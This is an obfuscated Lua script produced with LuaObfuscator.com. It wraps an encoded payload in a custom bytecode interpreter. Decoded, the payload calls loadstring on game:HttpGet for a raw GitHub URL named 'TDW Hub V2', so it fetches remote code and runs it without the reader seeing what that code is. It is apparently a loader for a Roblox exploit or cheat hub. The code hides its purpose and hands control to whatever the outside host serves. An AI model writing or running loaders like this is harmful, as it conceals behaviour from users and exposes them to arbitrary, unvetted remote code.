--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v109=v5(v86,v19);v19=nil;return v109;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/(((1 + 4) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v87-(v87%(620 -(555 + 64))) ;else local v88=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v88 + v88))>=v88) and ((1805 -(282 + 595)) -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (3 -0) );v18=v18 + 4 ;return (v40 * 16777216) + (v39 * (66601 -(68 + 997))) + (v38 * (1526 -((984 -758) + 1044))) + v37 ;end local function v24() local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(118 -(32 + 85))) then v44=(19 -(10 + 8)) + (0 -0) ;v45=(v20(v43,1,(447 -(416 + 26)) + 15 ) * ((959 -(892 + (207 -142)))^(75 -43))) + v42 ;v41=(2 + 1) -1 ;end if (v41==3) then if (v46==(0 -0)) then if (v45==(350 -(87 + 263))) then return v47 * (180 -(67 + 113)) ;else local v121=0 + 0 ;while true do if (v121==(0 -0)) then v46=1 + 0 ;v44=0 -0 ;break;end end end elseif (v46==2047) then return ((v45==(952 -(802 + 150))) and (v47 * ((2 -(1 -0))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(745 + 278) ) * (v44 + (v45/((999 -((1353 -(145 + 293)) + (512 -(44 + 386))))^(147 -95)))) ;end if (v41==(0 + 0)) then v42=v23();v43=v23();v41=(1487 -(998 + 488)) -0 ;end if (v41==(1189 -(340 + 729 + 118))) then v46=v20(v43,47 -26 ,67 -(30 + 6) );v47=((v20(v43,6 + 26 )==(1 -0)) and  -(1 + 0)) or (792 -(368 + 423)) ;v41=9 -6 ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(772 -(201 + 571))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1139 -(116 + 1022)) );v18=v18 + v48 ;local v50={};for v66=4 -3 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 611 -(210 + 401) ;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89~=0) then else local v114=(function() return 1821 -(1483 + 338) ;end)();local v115=(function() return;end)();while true do if (v114==(1695 -(1229 + 466))) then v115=(function() return 0;end)();while true do if (v115==1) then v89=(function() return  #"\\";end)();break;end if (v115==0) then v90=(function() return v91();end)();v92=(function() return nil;end)();v115=(function() return 1;end)();end end break;end end end if (v89== #",") then if (v90== #"[") then v92=(function() return v91()~=0 ;end)();elseif (v90==(580 -(386 + 192))) then v92=(function() return v93();end)();elseif (v90== #"xnx") then v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v52=(function() return function(v97,v98,v99) local v100=(function() return 1206 -(696 + 510) ;end)();local v101=(function() return;end)();while true do if (v100==0) then v101=(function() return 0 -0 ;end)();while true do if (v101==0) then local v122=(function() return 1262 -(1091 + 171) ;end)();while true do if (v122~=(0 + 0)) then else local v149=(function() return 0 -0 ;end)();while true do if (v149==(0 -0)) then v97[v98-#"~" ]=(function() return v99();end)();return v97,v98,v99;end end end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"~",v57 do FlatIdent_25011,Type,v21,Cons,v24,v25,v58,v68=(function() return v51(FlatIdent_25011,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"19("]=(function() return v21();end)();for v69= #"~",v23() do local v70=(function() return v21();end)();if (v20(v70, #",", #"|")==(374 -(123 + 251))) then local v105=(function() return 0 -0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105==(701 -(208 + 490))) then if (v20(v107, #"91(", #"xxx")~= #"[") then else v108[ #"0836"]=(function() return v58[v108[ #"?id="]];end)();end v53[v69]=(function() return v108;end)();break;end if (v105~=1) then else local v118=(function() return 0 + 0 ;end)();while true do if (v118~=(0 + 0)) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(0 + 0)) then local v150=(function() return 202 -(14 + 188) ;end)();local v151=(function() return;end)();while true do if (v150~=(675 -(534 + 141))) then else v151=(function() return 0;end)();while true do if (v151==(0 + 0)) then v108[ #"-19"]=(function() return v22();end)();v108[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"\\") then v108[ #"asd"]=(function() return v23();end)();elseif (v106==2) then v108[ #"xxx"]=(function() return v23() -((2 + 0)^(16 + 0)) ;end)();elseif (v106~= #"asd") then else local v180=(function() return 0 -0 ;end)();local v181=(function() return;end)();while true do if (v180~=(0 -0)) then else v181=(function() return 0;end)();while true do if (v181==(0 -0)) then v108[ #"-19"]=(function() return v23() -((2 + 0)^(11 + 5)) ;end)();v108[ #".dev"]=(function() return v22();end)();break;end end break;end end end v118=(function() return 1;end)();end if (v118==1) then v105=(function() return 398 -(115 + 281) ;end)();break;end end end if (v105==2) then if (v20(v107, #".", #"~")== #"!") then v108[4 -2 ]=(function() return v58[v108[2 + 0 ]];end)();end if (v20(v107,4 -2 ,7 -5 )== #">") then v108[ #"-19"]=(function() return v58[v108[ #"asd"]];end)();end v105=(function() return 870 -(550 + 317) ;end)();end if (v105==(0 -0)) then local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if (v119==0) then v120=(function() return 0 -0 ;end)();while true do if (v120~=1) then else v105=(function() return 1;end)();break;end if (v120==(0 -0)) then v106=(function() return v20(v70,2, #"91(");end)();v107=(function() return v20(v70, #".com",6);end)();v120=(function() return 286 -(134 + 151) ;end)();end end break;end end end end end end for v71= #">",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1666 -(970 + 695) ];local v64=v60[3 -(1203 -(373 + 829)) ];local v65=v60[1993 -(582 + 1408) ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=3 -2 ;local v77= -(1 -0);local v78={};local v79={...};local v80=v12("#",...) -((2556 -(476 + 255)) -(1195 + 629)) ;local v81={};local v82={};for v102=0 -0 ,v80 do if ((v102>=v74) or (4445<4149)) then v78[v102-v74 ]=v79[v102 + (1146 -(466 + (1809 -(369 + 761)))) ];else v82[v102]=v79[v102 + ((140 + 102) -(187 + 48 + 6)) ];end end local v83=(v80-v74) + (781 -(162 + 618)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[1901 -((200 -94) + 1794) ];if (v85<=(3 + 5)) then if (v85<=(3 + 0 + 0)) then if (v85<=(1 + 0 + 0)) then if (v85==(0 -0)) then v82[v84[3 -1 ]]=v62[v84[117 -(4 + 110) ]];else local v128=v84[2 -0 ];local v129=v82[v84[1 + 0 + 2 ]];v82[v128 + ((1875 -(64 + 174)) -(1373 + 263)) ]=v129;v82[v128]=v129[v84[3 + 1 ]];end elseif (v85>(1002 -(451 + 549))) then v82[v84[1 + 1 ]]={};else v82[v84[(1 + 1) -0 ]]=v84[4 -1 ]~=(1384 -(427 + 319 + (944 -306))) ;end elseif ((4962>1721) and (v85<=(16 -11))) then if ((v85>(4 + 0)) or (1818==85)) then v82[v84[1 + (337 -(144 + 192)) ]]=v84[4 -(217 -(42 + 174)) ];else local v137=v84[343 -(218 + 123) ];local v138,v139=v75(v82[v137](v13(v82,v137 + (1582 -(1535 + 46)) ,v84[3 + 0 ])));v77=(v139 + v137) -(1 + 0 + 0) ;local v140=560 -(306 + (550 -296)) ;for v152=v137,v77 do local v153=0 + 0 ;while true do if ((630<2127) and (v153==(1212 -(323 + 889)))) then v140=v140 + (2 -1) + 0 ;v82[v152]=v138[v140];break;end end end end elseif (v85<=(15 -9)) then do return;end elseif ((802<=4833) and (v85>7)) then local v154=0 -(0 -0) ;local v155;local v156;while true do if ((1468 -(899 + 166 + 402))==v154) then v82[v155 + 1 + 0 ]=v156;v82[v155]=v156[v84[417 -(15 + 170 + 228) ]];break;end if (v154==(0 + (0 -0))) then v155=v84[4 -2 ];v156=v82[v84[3]];v154=(1357 -(239 + 514)) -(268 + 335) ;end end else local v157=v84[292 -(60 + 230) ];v82[v157]=v82[v157](v13(v82,v157 + (573 -(150 + 276 + 146)) ,v77));end elseif ((v85<=(2 + (1590 -(1183 + 397)))) or (1938==2514)) then if (v85<=10) then if (v85>(1465 -(282 + (2503 -(797 + 532))))) then v82[v84[813 -(569 + 242) ]]=v84[8 -5 ]~=((0 -0) + 0) ;else v82[v84[1026 -(706 + 318) ]]();end elseif (v85>(9 + 2)) then v82[v84[1253 -(721 + 530) ]]=v62[v84[1274 -(945 + 237 + 89) ]];else v82[v84[4 -(2 + 0) ]]=v84[3 + 0 ];end elseif ((4255>=55) and (v85<=(714 -(271 + 429)))) then if ((2999>1156) and (v85>(5 + 8))) then v82[v84[2 + 0 ]]={};else v82[v84[1502 -(1408 + 92) ]]();end elseif ((2087==2087) and (v85<=(1101 -(461 + 625)))) then local v147=405 -(118 + 287) ;local v148;while true do if (v147==((435 + 853) -(993 + 295))) then v148=v84[2];v82[v148]=v82[v148](v13(v82,v148 + (2 -1) + 0 ,v77));break;end end elseif (v85==(1187 -(418 + 753))) then local v159=v84[1 + 1 ];local v160,v161=v75(v82[v159](v13(v82,v159 + 1 + 0 ,v84[1 + 2 ])));v77=(v161 + v159) -(1 + (1975 -(1913 + 62))) ;local v162=529 -(406 + 123) ;for v166=v159,v77 do v162=v162 + (978 -(553 + 424)) ;v82[v166]=v160[v162];end else do return;end end v76=v76 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403663Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F5468654F6E6557686F416C77617973576174636865732F526F626C6F782D536372697074732F726566732F68656164732F6D61696E2F5444572532304875622532305632000A4Q00037Q00120C000100013Q00120C000200023Q00200100020002000300120B000400044Q000A000500014Q0010000200054Q000F00013Q00022Q00090001000100012Q00063Q00017Q00",v9(),...);
